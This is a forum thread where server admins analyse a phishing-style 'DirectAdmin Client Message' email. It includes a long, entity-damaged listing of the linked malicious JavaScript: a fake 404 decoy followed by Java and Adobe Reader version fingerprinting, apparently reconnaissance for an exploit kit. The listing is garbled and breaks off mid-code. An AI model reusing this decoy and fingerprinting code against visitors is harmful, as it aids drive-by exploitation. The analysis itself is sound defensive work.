"DirectAdmin Client Message" Email - Scam/Real?

I've never clicked, but for all we know it could be some sort of key-logging stuff to get our DA details and such.
 
I think it is not the directadmin running on your server that has a vulnerability. It is probably the directadmin.com (216.194.67.119) server. But I do recommend you don't update directadmin, until there is more information about this issue.

Yes, but since I'm running an older version of DA, it may have a vulnerability that can be exploited (now that the bad guys know my servers' IPs).
 
I received two of these messages as well, I suppose since we own two licenses for DirectAdmin. This is a bit worrisome. I wonder how they got a hold of our names and email addresses?
 
This is what the javascript turns into:
-edit: see link in below post for the code-

If I had to guess it searches for old Java/PDF versions to exploit.
 
@aleto

Rather contact Panamaserver.com @ +507 832 2443; the URL you pointed to is only an iframe that includes the domain keinc0x.com, hosted on 200.63.47.52.
 
Here's the code from Arieh's post, tidied up to make it readable:

Code:
// NOTE(review): reading copy only. The forum's HTML re-rendering damaged this
// listing: `& amp; & amp;` stands for `&&`, `& gt;` / `& lt;` for `>` / `<`,
// several function bodies are collapsed into string literals, and some
// identifiers were lower-cased. Do not expect it to parse.

// Decoy: the page renders a fake "404 Not Found" so a visitor sees what looks
// like a dead link while the rest of the script keeps running.
document.write('<center><h1>404 Not Found</h1></center><hr>');

// Empty in this capture; it is the callback that spl6() schedules at the end
// of the listing.
function end_redirect() {}
// Relative path of a JAR passed to PluginDetect.getVersion("Java", ...) after
// the PluginDetect object is built; presumably loaded as an applet to read the
// Java version. The path is a useful string to search for in proxy / web logs
// when scoping which clients loaded this page.
var javafile = './games/getJavaInfo.jar';
// Detected Java and Adobe Reader versions; all zeros is the "not detected"
// default that the code after the try block also falls back to.
var jver = [0, 0, 0, 0],
    pdfver = [0, 0, 0, 0];
try {
    var PluginDetect = {
        handler: function(c, b, a) {
            return function() {
                c(b, a)
            }
        },
        isDefined: function(b) {
            return typeof b != "undefined"
        },
        isArray: function(b) {
            return (/array/i).test(Object.prototype.toString.call(b))
        },
        isFunc: function(b) {
            return typeof b == "function"
        },
        isString: function(b) {
            return typeof b == "string"
        },
        isNum: function(b) {
            return typeof b == "number"
        },
        isStrNum: function(b) {
            return (typeof b == "string" & amp; & amp;
            (/\d/).test(b))
        },
        getNumRegx: /[\d][\d\.\_,-]*/,
        splitNumRegx: /[\.\_,-]/g,
        getNum: function(b, c) {
            var d = this,
                a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
            return a ? a[0] : null
        },
        compareNums: function(h, f, d) {
            var e = this,
                c, b, a, g = parseInt;
            if (e.isStrNum(h) & amp; & amp; e.isStrNum(f)) {
                if (e.isDefined(d) & amp; & amp; d.compareNums) {
                    return d.compareNums(h, f)
                }
                c = h.split(e.splitNumRegx);
                b = f.split(e.splitNumRegx);
                for (a = 0; a < math.min(c.length, b.length); a++) {
                    if (g(c[a], 10) > g(b[a], 10)) {
                        return 1
                    }
                    if (g(c[a], 10) < g(b[a], 10)) {
                        return -1
                    }
                }
            }
            return = ""
            0
        },
        formatnum: function(b, c) {
            var = ""
            d = "this,a,e;if(!d.isStrNum(b)){return"
            null
        }
        if (!d.isnum(c)) {
            c = "4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a" > c || !(/\d/).test(e[a])) {
            e[a] = "0"
        }
    }
    return e.slice(0, 4).join(",")
}, $$hasMimeType: function(a) {
    return function(d) {
        if (!a.isIE & amp; & amp; d) {
            var c, b, e, f = a.isString(d) ? [d] : d;
            if (!f || !f.length) {
                return null
            }
            for (e = 0; e < f.length; e++) {
                if ([ ^ \s] = "".test(f[e]) && (c = "navigator.mimeTypes[f[e]])&&(b=c.enabledPlugin)&&(b.name||b.description)){return"
                c
                }
                }
            }
            return = ""
            null
        }
    }, findnavplugin: function(l, e, c) {
        var = ""
        j = "this,h=new"
        regexp(l, "i"),
            d = "(!j.isDefined(e)||e)?/\d/:0,k=c?new"
            regexp(c, "i"): 0,
            a = "navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return"
            a[f]
    }
}
}
return = ""
null
},
getmimeenabledplugin: function(a, f) {
    var = ""
    e = "this,b,c=new"
    regexp(f, "i"),
        d = "";
    if ((b = "e.hasMimeType(a))&&(b=b.enabledPlugin)&&(c.test(b.description||d)||c.test(b.name||d))){return"
    b
    }
    return = ""
    0
    }, getpluginfileversion: function(f, b) {
        var = ""
        h = "this,e,d,g,a,c=-1;if(h.OS" > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
        return b
    }
    if (!b) {
        return e
    }
    e = h.formatNum(e);b = h.formatNum(b);d = b.split(h.splitNumRegx);g = e.split(h.splitNumRegx);
    for (a = 0; a < d.length; a++) {
        if (c > -1 & amp; & amp; a & gt; c & amp; & amp; d[a] != "0") {
            return b
        }
        if (g[a] != d[a]) {
            if (c == -1) {
                c = a
            }
            if (d[a] != "0") {
                return b
            }
        }
    }
    return e
},
AXO: window.ActiveXObject,
// Existence probe for an ActiveX control (Internet Explorer only).
// b: ProgID string, such as the "Msxml2.XMLHTTP" or "JavaPlugin..." names
//    used elsewhere in this listing.
// Returns the instantiated object, or null when construction throws.
getAXO: function(b) {
    var f = null,
        d, c = this,
        a;
    try {
        // c.AXO is window.ActiveXObject (the AXO property just above); where
        // that is undefined the `new` throws and the error is swallowed.
        f = new c.AXO(b)
    } catch (d) {}
    return f
},
convertFuncs: function(g) {
    var a, h, f, b = /^[\$][\$]/,
        d = {},
        c = this;
    for (a in g) {
        if (b.test(a)) {
            d[a] = 1
        }
    }
    for (a in d) {
        try {
            h = a.slice(2);
            if (h.length & gt; 0 & amp; & amp; !g[h]) {
                g[h] = g[a](g);
                delete g[a]
            }
        } catch (f) {}
    }
},
initScript: function() {
    var c = this,
        a = navigator,
        e = "/",
        i = a.userAgent || "",
        g = a.vendor || "",
        b = a.platform || "",
        h = a.product || "";
    c.OS = 100;
    if (b) {
        var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
        for (f = d.length - 2; f & gt; = 0; f = f - 2) {
            if (d[f] & amp; & amp; new RegExp(d[f], "i").test(b)) {
                c.OS = d[f + 1];
                break
            }
        }
    }
    c.convertFuncs(c);
    c.isIE = new Function("return " + e + "*@cc_on!@*" + e + "false")();
    c.verIE = c.isIE & amp; & amp;
    (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
    c.ActiveXEnabled = false;
    if (c.isIE) {
        var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
        for (f = 0; f < j.length; f++) {
            if (c.getaxo(j[f])) {
                c.activexenabled = true;
                break
            }
        }
        c.head = c.isdefined(document.getelementsbytagname) ? document.getelementsbytagname("head")[0] : null
    }
    c.isgecko = (gecko = ""
    i).test(h) && ( = ""
    gecko\s * \ = ""\s * \d = ""
    i).test(i);
    c.vergecko = "c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;c.isSafari=(/Safari\s*\/\s*\d/i).test(i)&&(/Apple/i).test(g);c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load",c.handler(c.runWLfuncs,c))},init:function(c){var"
    b = "this,a,c;if(!b.isString(c)){return" - 3
}
if (c.length = "=1){b.getVersionDelimiter=c;return" - 3
}
c = "c.toLowerCase().replace(/\s/g,"");a=b[c];if(!a||!a.getVersion){return" - 3
}
b.plugin = "a;if(!b.isDefined(a.installed)){a.installed=a.version=a.version0=a.getVersionDone=null;a.$=b;a.pluginName=c}b.garbage=false;if(b.isIE&&!b.ActiveXEnabled){if(a!==b.java){return" - 2
}
}
return = ""
1
},
fpush: function(b, a) {
    var = ""
    c = "this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length" > 0 & amp; & amp;
    c.isFunc(b[0])))) {
    a.push(b)
}
},
callArray: function(b) {
    var c = this,
        a;
    if (c.isArray(b)) {
        for (a = 0; a < b.length; a++) {
            if (b[a] === null) {
                return
            }
            c.call(b[a]);
            b[a] = null
        }
    }
},
call: function(c) {
    var b = "this,a=b.isArray(c)?c.length:-1;if(a" > 0 & amp; & amp;
    b.isFunc(c[0])) {
    c[0](b, a & gt; 1 ? c[1] : 0, a & gt; 2 ? c[2] : 0, a & gt; 3 ? c[3] : 0)
} else {
    if (b.isFunc(c)) {
        c(b)
    }
}
},
getVersionDelimiter: ",",
$$getVersion: function(a) {
    return function(g, d, c) {
        var e = a.init(g),
            f, b, h;
        if (e & lt; 0) {
            return null
        };
        f = a.plugin;
        if (f.getVersionDone != 1) {
            f.getVersion(null, d, c);
            if (f.getVersionDone === null) {
                f.getVersionDone = 1
            }
        }
        a.cleanup();
        b = (f.version || f.version0);
        b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
        return b
    }
},
cleanup: function() {
    var a = this;
    if (a.garbage & amp; & amp; a.isDefined(window.CollectGarbage)) {
        window.CollectGarbage()
    }
},
addWinEvent: function(d, c) {
    var e = this,
        a = window,
        b;
    if (e.isFunc(c)) {
        if (a.addEventListener) {
            a.addEventListener(d, c, false)
        } else {
            if (a.attachEvent) {
                a.attachEvent("on" + d, c)
            } else {
                b = a["on" + d];
                a["on" + d] = e.winHandler(c, b)
            }
        }
    }
},
winHandler: function(d, c) {
    return function() {
        d();
        if (typeof c == "function") {
            c()
        }
    }
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function(a) {
    a.winLoaded = true;
    a.callArray(a.WLfuncs0);
    a.callArray(a.WLfuncs);
    if (a.onDoneEmptyDiv) {
        a.onDoneEmptyDiv()
    }
},
winLoaded: false,
$$onWindowLoaded: function(a) {
    return function(b) {
        if (a.winLoaded) {
            a.call(b)
        } else {
            a.fPush(b, a.WLfuncs)
        }
    }
},
div: null,
divWidth: 50,
pluginSize: 1,
emptyDiv: function() {
    var c = this,
        a, e, b, d = 0;
    if (c.div & amp; & amp; c.div.childNodes) {
        for (a = c.div.childNodes.length - 1; a & gt; = 0; a--) {
            b = c.div.childNodes[a];
            if (b & amp; & amp; b.childNodes) {
                if (d == 0) {
                    for (e = b.childNodes.length - 1; e & gt; = 0; e--) {
                        b.removeChild(b.childNodes[e])
                    }
                    c.div.removeChild(b)
                } else {}
            }
        }
    }
},
DONEfuncs: [],
onDoneEmptyDiv: function() {
    var c = this,
        a, b;
    if (!c.winLoaded) {
        return
    }
    if (c.WLfuncs & amp; & amp; c.WLfuncs.length & amp; & amp; c.WLfuncs[c.WLfuncs.length - 1] !== null) {
        return
    }
    for (a in c) {
        b = c[a];
        if (b & amp; & amp; b.funcs) {
            if (b.OTF == 3) {
                return
            }
            if (b.funcs.length & amp; & amp; b.funcs[b.funcs.length - 1] !== null) {
                return
            }
        }
    }
    for (a = 0; a < c.donefuncs.length; a++) {
        c.callarray(c.donefuncs)
    }
    c.emptydiv()
},
getwidth: function(c) {
    if (c) {
        var a = "c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return"
        a
    }
}
return = "" - 1
},
gettagstatus: function(m, g, a, b) {
    var = ""
    c = "this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return" - 2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= "c.pluginSize||c.pluginSize<1){return"
0
}
if (l = "" >= i) {
    return -1
}
try {
    if (l == c.pluginSize & amp; & amp;
    (!c.isIE || c.getDOMobj(m).readyState == 4)) {
        if (!m.winLoaded & amp; & amp; c.winLoaded) {
            return 1
        }
        if (m.winLoaded & amp; & amp; c.isNum(b)) {
            if (!c.isNum(m.count)) {
                m.count = b
            }
            if (b - m.count & gt; = 10) {
                return 1
            }
        }
    }
} catch (f) {}
return 0
},
getDOMobj: function(g, a) {
    var f, d = this,
        c = g ? g.span : 0,
        b = c & amp; & amp;
    c.firstChild ? 1 : 0;
    try {
        if (b & amp; & amp; a) {
            c.firstChild.focus()
        }
    } catch (f) {}
    return b ? c.firstChild : null
},
setStyle: function(b, g) {
    var f = b.style,
        a, d, c = this;
    if (f & amp; & amp; g) {
        for (a = 0; a < g.length; a = a + 2) {
            try {
                f[g[a]] = g[a + 1]
            } catch (d) {}
        }
    }
},
insertdivinbody: function(i) {
    var g, d = "this,h="pd33993399",c=null,f=document,b="<",a=(f.getElementsByTagName("body")[0]||f.body);if(!a){try{f.write(b+'div"
    id = "'+h+'" > o '+b+"/div>");c=f.getElementById(h)}catch(g){}}a=(f.getElementsByTagName("body")[0]||f.body);if(a){if(a.firstChild&&d.isDefined(a.insertBefore)){a.insertBefore(i,a.firstChild)}else{a.appendChild(i)}if(c){a.removeChild(c)}}else{}},insertHTML:function(g,b,h,a,k){var l,m=document,j=this,q,o=m.createElement("span"),n,i,f="<";var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];if(!j.isDefined(a)){a=""}if(j.isString(g)&&(/[^\s]/).test(g)){q=f+g+'
    width = "'+j.pluginSize+'"
    height = "'+j.pluginSize+'"';for(n=0;n<b.length;n=n+2){if( [^\s]="" .test(b[n+1])){q+="b[n]+' = & quot;
    '+b[n+1]+' & quot;
    " '}}q+=" & gt;
    " ;for(n="
    0;
    n & lt;
    h.length;
    n = n + 2) {
    if (/[^\s]/.test(h[n + 1])) {
        q += f + 'param" name="' + h[n] + '" value="' + h[n + 1] + '">'
    }
}
q += a + f + "/" + g + ">"
} else {
    q = a
}
if (!j.div) {
    j.div = m.createElement("div");
    i = m.getElementById("plugindetect");
    if (i) {
        j.div = i
    } else {
        j.div.id = "plugindetect";
        j.insertDivInBody(j.div)
    }
    j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
    if (!i) {
        j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
    }
}
if (j.div & amp; & amp; j.div.parentNode) {
    j.div.appendChild(o);
    j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
    try {
        if (o & amp; & amp; o.parentNode) {
            o.focus()
        }
    } catch (l) {}
    try {
        o.innerHTML = q
    } catch (l) {}
    if (o.childNodes.length == 1 & amp; & amp; !(j.isGecko & amp; & amp; j.compareNums(j.verGecko, "1,5,0,0") & lt; 0)) {
        j.setStyle(o.firstChild, c.concat(["display", "inline"]))
    }
    return {
        span: o,
        winLoaded: j.winLoaded,
        tagName: (j.isString(g) ? g : "")
    }
}
return {
    span: null,
    winLoaded: j.winLoaded,
    tagName: ""
}
},
java: {
    mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
    mimeTypeJPI: "application/x-java-applet;jpi-version=",
    classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
    DTKclassID: "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",
    DTKmimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
    forceVerifyTag: [],
    jar: [],
    Enabled: navigator.javaEnabled(),
    VENDORS: ["Sun Microsystems Inc.", "Apple Computer, Inc."],
    OTF: null,
    All_versions: [],
    mimeTypeJPIresult: "",
    JavaPlugin_versions: [],
    JavaVersions: [
        [1, 9, 2, 30],
        [1, 8, 2, 30],
        [1, 7, 2, 30],
        [1, 6, 1, 30],
        [1, 5, 1, 30],
        [1, 4, 2, 30],
        [1, 3, 1, 30]
    ],
    // IE-only path: looks for an installed Java plug-in by probing ActiveX
    // ProgIDs through searchJavaAXO().
    // Returns the first version string found, or null when ActiveX is disabled
    // or nothing matched. Every hit is also copied to this.JavaPlugin_versions.
    // (`& gt;` / `& amp; & amp;` below are HTML-entity damage for `>` / `&&`.)
    searchJavaPluginAXO: function() {
        var h = null,
            a = this,
            c = a.$,
            g = [],
            j = [1, 5, 0, 14],
            i = [1, 6, 0, 2],
            f = [1, 3, 1, 0],
            e = [1, 4, 2, 0],
            d = [1, 5, 0, 7],
            b = false;
        // Without ActiveX none of the probes below can succeed.
        if (!c.ActiveXEnabled) {
            return null
        };
        if (c.verIE & gt; = a.minIEver) {
            // b is always false, so searchJavaAXO() returns on its first hit
            // and the nested re-scan with `j` never runs.
            g = a.searchJavaAXO(i, i, b);
            if (g.length & gt; 0 & amp; & amp; b) {
                g = a.searchJavaAXO(j, j, b)
            }
        } else {
            // Older IE: scan with the 1.3.1 / 1.4.2 bounds instead.
            if (g.length == 0) {
                g = a.searchJavaAXO(f, e, false)
            }
        }
        if (g.length & gt; 0) {
            h = g[0]
        }
        a.JavaPlugin_versions = [].concat(g);
        return h
    },
    searchJavaAXO: function(l, i, m) {
        var n, f, h = this.$,
            q, k, a, e, g, j, b, r = [];
        if (h.compareNums(l.join(","), i.join(",")) & gt; 0) {
            i = l
        }
        i = h.formatNum(i.join(","));
        var o, d = "1,4,2,0",
            c = "JavaPlugin." + l[0] + "" + l[1] + "" + l[2] + "" + (l[3] & gt; 0 ? ("_" + (l[3] & lt; 10 ? "0" : "") + l[3]) : "");
        for (n = 0; n < this.javaversions.length; n++) {
            f = this.javaversions[n];
            q = "javaplugin." + f[0] + "" + f[1];
            g = f[0] + "." + f[1] + ".";
            for (a = f[2]; a >= 0; a--) {
                b = "JavaWebStart.isInstalled." + g + a + ".0";
                if (h.compareNums(f[0] + "," + f[1] + "," + a + ",0", i) & gt; = 0 & amp; & amp; !h.getAXO(b)) {
                    continue
                }
                o = h.compareNums(f[0] + "," + f[1] + "," + a + ",0", d) & lt;
                0 ? true : false;
                for (e = f[3]; e & gt; = 0; e--) {
                    k = a + "_" + (e & lt; 10 ? "0" + e : e);
                    j = q + k;
                    if (h.getAXO(j) & amp; & amp;
                    (o || h.getAXO(b))) {
                        r.push(g + k);
                        if (!m) {
                            return r
                        }
                    }
                    if (j == c) {
                        return r
                    }
                }
                if (h.getAXO(q + a) & amp; & amp;
                (o || h.getAXO(b))) {
                    r.push(g + a);
                    if (!m) {
                        return r
                    }
                }
                if (q + a == c) {
                    return r
                }
            }
        }
        return r
    },
    minIEver: 7,
    getMimeJPIversion: function() {
        var h, a = this,
            d = a.$,
            c = new RegExp("(" + a.mimeTypeJPI + ")(\\d.*)", "i"),
            k = new RegExp("Java", "i"),
            e, j, f = "",
            i = {},
            g = 0,
            b;
        for (h = 0; h < navigator.mimetypes.length; h++) {
            j = navigator.mimetypes[h];
            if (c.test(j.type) && (e = j.enabledplugin) && (j = regexp.$2) && (k.test(e.description || f) || k.test(e.name || f))) {
                i["a" + d.formatnum(j)] = j
            }
        }
        b = "0,0,0,0";
        for (h in = ""
        i) {
            g++;
            e = "h.slice(1);if(d.compareNums(e,b)" > 0) {
            b = e
        }
    }
    a.mimeTypeJPIresult = g & gt;0 ? a.mimeTypeJPI + i["a" + b] : "";
    return g & gt;0 ? b : null
},
getVersion: function(m, d, l) {
    var f, c = this,
        e = c.$,
        h = c.NOTF,
        b = c.applet,
        j = c.verify,
        i = vendor = versionEnabled = null;
    if (c.getVersionDone === null) {
        c.OTF = 0;
        c.mimeObj = e.hasMimeType(c.mimeType);
        c.deployTK.$ = e;
        c.deployTK.parentNode = c;
        b.$ = e;
        b.parentNode = c;
        if (h) {
            h.$ = e;
            h.parentNode = c
        }
        if (j) {
            j.parentNode = c;
            j.$ = e;
            j.init()
        }
    }
    var k;
    if (e.isArray(l)) {
        for (k = 0; k < b.allowed.length; k++) {
            if (e.isnum(l[k])) {
                b.allowed[k] = l[k]
            }
        }
    }
    for (k = 0; k < c.forceverifytag.length; k++) {
        b.allowed[k] = c.forceverifytag[k]
    }
    if (e.isstring(d)) {
        c.jar.push(d)
    }
    if (c.getversiondone == 0) {
        if (!c.version || b.cantryany()) {
            f = b.inserthtmlqueryall(d);
            if (f[0]) {
                c.installed = 1;
                c.endgetversion(f[0], f[1])
            }
        }
        return
    }
    var g = "c.deployTK.query();if(g.JRE){i=g.JRE;vendor=c.VENDORS[0]}if(!e.isIE){var"
    q,
        n, a, o;
    o = "(c.mimeObj&&c.Enabled)?true:false;if(!i&&(f=c.getMimeJPIversion())!==null){i=f}if(!i&&c.mimeObj){f="Java[^\\d]*Plug-in";a=e.findNavPlugin(f);if(a){f=new"
    regexp(f, "i");
    q = "f.test(a.description||"")?e.getNum(a.description):null;n=f.test(a.name||"")?e.getNum(a.name):null;if(q&&n){i=(e.compareNums(e.formatNum(q),e.formatNum(n))" >= 0) ? q : n
} else {
    i = q || n
}
}
}
if (!i & amp; & amp; c.mimeObj & amp; & amp; e.isSafari & amp; & amp; e.OS == 2) {
    a = e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa", 0);
    if (a) {
        q = e.getNum(a.description);
        if (q) {
            i = q
        }
    }
}
if (i) {
    c.version0 = i;
    if (c.Enabled) {
        versionEnabled = i
    }
}
} else {
    if (!i & amp; & amp; g.status == 0) {
        i = c.searchJavaPluginAXO();
        if (i) {
            vendor = c.VENDORS[0]
        }
    }
    if (i) {
        c.version0 = i;
        if (c.Enabled & amp; & amp; e.ActiveXEnabled) {
            versionEnabled = i
        }
    }
}
if (!versionEnabled || b.canTryAny()) {
    f = b.insertHTMLQueryAll(d);
    if (f[0]) {
        versionEnabled = f[0];
        vendor = f[1]
    }
}
if (!versionEnabled & amp; & amp;
(f = c.queryWithoutApplets())[0]) {
    c.version0 = versionEnabled = f[0];
    vendor = f[1];
    if (c.installed == -0.5) {
        c.installed = 0.5
    }
}
if (e.isSafari & amp; & amp; e.OS == 2) {
    if (!versionEnabled & amp; & amp; o) {
        if (c.installed === null) {
            c.installed = 0
        } else {
            if (c.installed == -0.5) {
                c.installed = 0.5
            }
        }
    }
}
if (c.jreDisabled()) {
    versionEnabled = null
};
if (c.installed === null) {
    c.installed = versionEnabled ? 1 : (i ? -0.2 : -1)
}
c.EndGetVersion(versionEnabled, vendor)
},
EndGetVersion: function(b, d) {
    var a = this,
        c = a.$;
    if (a.version0) {
        a.version0 = c.formatNum(c.getNum(a.version0))
    }
    if (b) {
        a.version = c.formatNum(c.getNum(b));
        a.vendor = (c.isString(d) ? d : "")
    }
    if (a.getVersionDone != 1) {
        a.getVersionDone = 0
    }
},
jreDisabled: function() {
    var b = this,
        d = b.$,
        c = b.deployTK.query().JRE,
        a;
    if (c & amp; & amp; d.OS == 1) {
        if ((d.isGecko & amp; & amp; d.compareNums(d.verGecko, "1,9,2,0") & gt; = 0 & amp; & amp; d.compareNums(c, "1,6,0,12") & lt; 0) || (d.isChrome & amp; & amp; d.compareNums(c, "1,6,0,12") & lt; 0)) {
            return 1
        }
    };
    if (d.isOpera & amp; & amp; d.verOpera & gt; = 9 & amp; & amp; !b.Enabled & amp; & amp; !b.mimeObj & amp; & amp; !b.queryWithoutApplets()[0]) {
        return 1
    }
    if ((d.isGecko || d.isChrome) & amp; & amp; !b.mimeObj & amp; & amp; !b.queryWithoutApplets()[0]) {
        return 1
    }
    return 0
},
// Version lookup through the Java Deployment Toolkit browser object.
// status: null = not queried yet, 0 = queried without a usable answer,
//         1 = toolkit reported at least one JVM, -1 = toolkit reported none.
// JREall: version strings read from the toolkit; JRE: formatted JREall[0].
// (`& amp; & amp;`, `& gt;`, `& lt;` are HTML-entity damage for `&&`, `>`, `<`;
// `getnum` / `jreall` are lower-cased copies of getNum / JREall.)
deployTK: {
    status: null,
    JREall: [],
    JRE: null,
    HTML: null,
    // Runs the toolkit query once and caches the outcome on this object.
    // Returns this object in every case; callers read .JRE and .status.
    query: function() {
        // NOTE(review): `g = len = null` assigns `len` without declaring it,
        // so `len` becomes an implicit global.
        var f = this,
            h = f.$,
            c = f.parentNode,
            i, a, b, g = len = null;
        // Already queried: reuse the cached result.
        if (f.status !== null) {
            return f
        }
        f.status = 0;
        // Skipped outright on old Gecko, Safari, Chrome, and IE without ActiveX.
        if ((h.isGecko & amp; & amp; h.compareNums(h.verGecko, h.formatNum("1.6")) & lt; = 0) || h.isSafari || h.isChrome || (h.isIE & amp; & amp; !h.ActiveXEnabled)) {
            return f
        }
        // Insert an <object> element: bare on IE 6+ (classid is set further
        // down), typed with the toolkit MIME type on other browsers that
        // advertise it.
        if (h.isIE & amp; & amp; h.verIE & gt; = 6) {
            f.HTML = h.insertHTML("object", [], []);
            g = h.getDOMobj(f.HTML)
        } else {
            if (!h.isIE & amp; & amp;
            (b = h.hasMimeType(c.DTKmimeType)) & amp; & amp; b.type) {
                f.HTML = h.insertHTML("object", ["type", b.type], []);
                g = h.getDOMobj(f.HTML)
            }
        }
        if (g) {
            if (h.isIE & amp; & amp; h.verIE & gt; = 6) {
                try {
                    g.classid = c.DTKclassID
                } catch (i) {}
            };
            try {
                // `jvms` is read from the inserted object; its entries are
                // walked last-to-first, so JREall[0] is the last list entry
                // (presumably the newest JRE, which the listing does not confirm).
                var d = g.jvms;
                if (d) {
                    len = d.getLength();
                    if (h.isNum(len)) {
                        f.status = len & gt;
                        0 ? 1 : -1;
                        for (a = 0; a < len; a++) {
                            b = h.getnum(d.get(len - 1 - a).version);
                            if (b) {
                                f.jreall[a] = b
                            }
                        }
                    }
                }
            } catch (i) {}
        }
        if (f.jreall.length > 0) {
            f.JRE = h.formatNum(f.JREall[0])
        }
        return f
    }
},
// Reads the Java version and vendor through the browser's `window.java`
// bridge, i.e. without inserting an applet or object tag.
// c: unused here. a: holder object; on success a.value becomes
//    [version + " ", vendor + " "] (each string carries a trailing space).
// Any exception is swallowed and a.value is left as the caller set it.
// (`& amp; & amp;` below is HTML-entity damage for `&&`.)
queryWithoutApplets00: function(c, a) {
    var b = window.java,
        d;
    try {
        if (b & amp; & amp; b.lang & amp; & amp; b.lang.System) {
            a.value = [b.lang.System.getProperty("java.version") + " ", b.lang.System.getProperty("java.vendor") + " "]
        }
    } catch (d) {}
},
queryWithoutApplets: function() {
    var c = this,
        f = c.$,
        g, a = c.queryWithoutApplets;
    if (!a.value) {
        a.value = [null, null];
        if (!f.isIE & amp; & amp; window.java) {
            if (f.OS == 2 & amp; & amp; f.isOpera & amp; & amp; f.verOpera & lt; 9.2 & amp; & amp; f.verOpera & gt; = 9) {} else {
                if (f.isGecko & amp; & amp; f.compareNums(f.verGecko, "1,9,0,0") & lt; 0 & amp; & amp; f.compareNums(f.verGecko, "1,8,0,0") & gt; = 0) {} else {
                    if (f.isGecko) {
                        var i, b, h = document;
                        if (h.createElement & amp; & amp; h.createEvent) {
                            try {
                                i = h.createElement("div"), b = h.createEvent("HTMLEvents");
                                b.initEvent("change", false, false);
                                i.addEventListener("change", f.handler(c.queryWithoutApplets00, f, a), false);
                                i.dispatchEvent(b)
                            } catch (g) {}
                        }
                    } else {
                        c.queryWithoutApplets00(f, a)
                    }
                }
            }
        }
    }
    return a.value
},
applet: {
    results: [
        [null, null],
        [null, null],
        [null, null]
    ],
    HTML: [0, 0, 0],
    active: [0, 0, 0],
    allowed: [2, 2, 2],
    DummyObjTagHTML: 0,
    DummySpanTagHTML: 0,
    getResult: function() {
        var c = this.results,
            a, b;
        for (a = 0; a < c.length; a++) {
            b = c[a];
            if (b[0]) {
                break
            }
        }
        return [].concat(b)
    },
    cantry: function(d) {
        var b = "this,c=b.$,a=b.parentNode;if(b.allowed[d]==3){return"
        true
    }
    if (!a.version0 || !a.enabled || (c.isie && !c.activexenabled)) {
        if (b.allowed[d] = "=2){return"
        true
        }
        if (b.allowed[d] = "=1&&!b.getResult()[0]){return"
        true
        }
    }
    return = ""
    false
},
cantryany: function() {
    var = ""
    false
},
canuseapplettag: function() {
    var = ""
    a = "this,b=a.$;return(!b.isIE||b.ActiveXEnabled)},queryThis:function(h){var"
    g,
        c = "this,b=c.parentNode,f=b.$,a=vendor=null,d=f.getDOMobj(c.HTML[h],true);if(d){try{a=d.getVersion()+""";vendor="
        d.getVendor() + & quot;
    " ";
    d.statusbar(f.winloaded ? "="" " : "="" ")
} catch (g) {}
if (f.isstrnum(a)) {
    c.results[h] = "[a,vendor]}try{if(f.isIE&&a&&d.readyState!=4){f.garbage=true;d.parentNode.removeChild(d)}}catch(g){}}},insertHTMLQueryAll:function(e){var"
    g = "this,n=g.parentNode,d=n.$,o=g.results,q=g.HTML,h="    ",u="A.class";if(!d.isString(e)||!(/\.jar\s*$/).test(e)||(/\\/).test(e)){return[null,null]}if(n.OTF<1){n.OTF=1}if(n.jreDisabled()){return[null,null]}if(n.OTF<2){n.OTF=2}var"
    c = "e,t="",m;if((/[\/]/).test(e)){m=e.split("/");c=m[m.length-1];m[m.length-1]="";t=m.join("/")}var"
